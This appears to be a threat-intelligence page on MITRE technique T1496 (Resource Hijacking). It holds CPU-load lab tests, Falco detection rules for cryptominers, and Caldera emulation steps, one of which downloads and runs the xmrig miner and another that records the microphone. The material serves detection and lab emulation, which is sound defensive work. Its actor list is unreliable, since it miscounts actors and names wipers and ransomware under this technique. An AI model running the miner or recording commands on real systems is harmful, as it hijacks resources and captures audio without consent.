
Resource Hijacking

T1496 · impact

Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. Resource hijacking may take a number of different forms. For example, adversaries may:
- Leverage compute resources in order to mine cryptocurrency
- Sell network bandwidth to proxy networks
- Generate SMS traffic for profit
- Abuse cloud-based messaging services to send large quantities of spam messages
In some cases, adversaries may leverage multiple types of Resource Hijacking at once.

Platforms: Windows, IaaS, Linux, macOS, Containers, SaaS

Actors Using This

12 actors:
- APT41 [china]
- CaddyWiper [russia_apt_sandworm]
- HermeticWiper [russia_apt_sandworm_adjacent]
- NotPetya [russia_apt_sandworm]
- Olympic Destroyer [russia_apt_sandworm]
- Prestige ransomware [russia_apt_sandworm]
- RansomBoggs [russia_apt_sandworm]
- SwiftSlicer [russia_apt_sandworm]
- TeamTNT (Cloud Cryptojacking Operator) [financially_motivated_cybercrime_cloud_native_cryptojacking_specialist_german_speaking_indicators]
- UNC4990 (Italy USB Cryptojacking Operator) [financially_motivated_italy_based_criminal_mandiant_medium_confidence_unc4990]
- WhisperGate [russia_apt_cadet_blizzard]

Likely Attack Path

Techniques the same actors pair with this one distinctively, i.e. those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
- lateral-movement (earlier in the chain)

Atomic Tests

2 tests. Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.

[sh | linux, macos] FreeBSD/macOS/Linux - Simulate CPU Load with Yes
This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break.
    yes > /dev/null

[powershell | windows] Windows - Simulate CPU Load with PowerShell
This test simulates high CPU load using PowerShell, commonly seen in resource hijacking. Spawns background jobs to stress CPU cores for a specified duration.
    $end = (Get-Date).AddSeconds(#{duration_seconds})
    1..#{cpu_threads} | ForEach-Object { Start-Job { param($t) while((Get-Date) -lt $t) { $i=0; while($i -lt 200000){$i++} } } -ArgumentList $end }
    Get-Job | Wait-Job | Remove-Job

Detection Coverage

3/6 layers covered. Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
- Behavioral / log (Sigma): 13
- Analytics (MITRE CAR): none
- Runtime / container (Falco): 3
- File / malware (YARA): none
- Network (Suricata/Snort): 45
- Vuln scan (Nuclei): none

Falco Runtime Rules

3 rules. Container / Linux runtime detections that fire on this technique.

[CRITICAL] Detect outbound connections to common miner pool ports
Miners usually connect to miner pools using standard ports, and this rule flags such activity. Important: Falco currently sends DNS requests to resolve miner pool domains, which could trigger other alerts. Prior to enabling this rule, it's advised to confirm whether this is acceptable for your environment. This rule is disabled by default for that reason.
Condition:
    net_miner_pool and not trusted_images_query_miner_domain_dns

[CRITICAL] Detect crypto miners using the Stratum protocol
Miners commonly specify the mining pool to connect to using a URI that starts with "stratum+tcp". However, this rule is highly specific to this technique, and matching command-line arguments can generally be bypassed quite easily.
Condition:
    spawned_process and (proc.cmdline contains "stratum+tcp" or
         proc.cmdline contains "stratum2+tcp" or
         proc.cmdline contains "stratum+ssl" or
         proc.cmdline contains "stratum2+ssl")

[CRITICAL] Known Cryptominer Process Executed
Detects execution of known cryptocurrency mining software by matching process names against a list of common miners. Cryptominers are commonly deployed by attackers after gaining initial access to monetize compromised systems. This rule complements the existing "Detect crypto miners using the Stratum protocol" rule by catching miners that may use renamed binaries but still match known miner process names. Consider tuning this rule if you have legitimate mining operations in your environment.
Condition:
    spawned_process and is_miner_process
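To see how the two process-based Falco rules above overlap and where each one alone falls short, here is an added Python re-implementation of their conditions run over constructed process-spawn events. It is not Falco's own code; the miner name list stands in for Falco's `is_miner_process` macro, which the page does not show (xmrig is taken from the Caldera ability on this page, the other names are assumed).

```python
from dataclasses import dataclass

# The four URI schemes the Stratum rule checks with "proc.cmdline contains".
STRATUM_SCHEMES = ("stratum+tcp", "stratum2+tcp", "stratum+ssl", "stratum2+ssl")

# Assumed stand-in for Falco's is_miner_process macro (real list not on the page).
KNOWN_MINER_NAMES = {"xmrig", "minerd", "cpuminer"}

STRATUM_RULE = "Detect crypto miners using the Stratum protocol"
MINER_NAME_RULE = "Known Cryptominer Process Executed"


@dataclass
class SpawnEvent:
    """Minimal spawned_process event: proc.name and proc.cmdline as Falco sees them."""
    proc_name: str
    cmdline: str


def matches_stratum_rule(ev: SpawnEvent) -> bool:
    # Substring match, case-sensitive, like Falco's "contains" operator.
    return any(scheme in ev.cmdline for scheme in STRATUM_SCHEMES)


def matches_known_miner_rule(ev: SpawnEvent) -> bool:
    # Exact process-name match against the known-miner list.
    return ev.proc_name in KNOWN_MINER_NAMES


def evaluate(ev: SpawnEvent) -> list[str]:
    """Return the titles of the rules that would fire for this event."""
    hits = []
    if matches_stratum_rule(ev):
        hits.append(STRATUM_RULE)
    if matches_known_miner_rule(ev):
        hits.append(MINER_NAME_RULE)
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    SpawnEvent("xmrig", "./xmrig -o stratum+tcp://pool.example:3333"),  # both rules
    SpawnEvent("kworkerd", "./kworkerd -o stratum+ssl://pool.example:443"),  # renamed, URI still visible
    SpawnEvent("xmrig", "./xmrig --config=config.json"),  # pool hidden in config, name still matches
    SpawnEvent("nginx", "nginx -g daemon off;"),  # benign, no rule fires
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{ev.proc_name:10} -> {evaluate(ev) or ['no alert']}")
```

The second and third events show why the page treats the two rules as complementary: each evades one rule while still tripping the other.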

Caldera Emulation

2 abilities. MITRE Caldera abilities that emulate this technique; each is an executable action for automated adversary emulation.

[impact | linux, darwin, windows] Crypto (Monero) Mining
    wget https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz;
    tar -xf xmrig-6.11.2-linux-x64.tar.gz;
    timeout 60 ./xmrig-6.11.2/xmrig;
    [ $? -eq 124 ]

[impact | darwin] Record microphone
    brew install sox >/dev/null 2>&1;
    sox -d recording.wav trim 0 15 >/dev/null 2>&1;
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin